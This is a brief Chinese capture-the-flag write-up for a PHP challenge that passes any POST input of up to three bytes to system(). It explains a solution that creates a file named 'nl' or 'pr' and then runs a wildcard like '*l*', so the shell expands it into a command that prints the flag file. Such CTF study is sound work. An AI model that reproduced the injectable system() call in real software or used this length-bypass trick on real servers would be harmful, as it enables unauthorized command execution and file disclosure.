极限命令执行6三字节RCE
<?php
error_reporting(0);
if (isset($_POST['ctf_show'])) {$ctfshow = $_POST['ctf_show'];if (is_string($ctfshow) && strlen($ctfshow) <= 3) {sleep(1);system($ctfshow);}
}else{highlight_file(__FILE__);
}
?>
原理请看这篇文章
目前发现一个新解法,根据实际查询到的文件名,先执行>nl生成nl文件,然后执行*l*即可触发nl flag.php
或者先执行>pr生成pr文件,然后执行*r*即可触发pr whereisflag.php
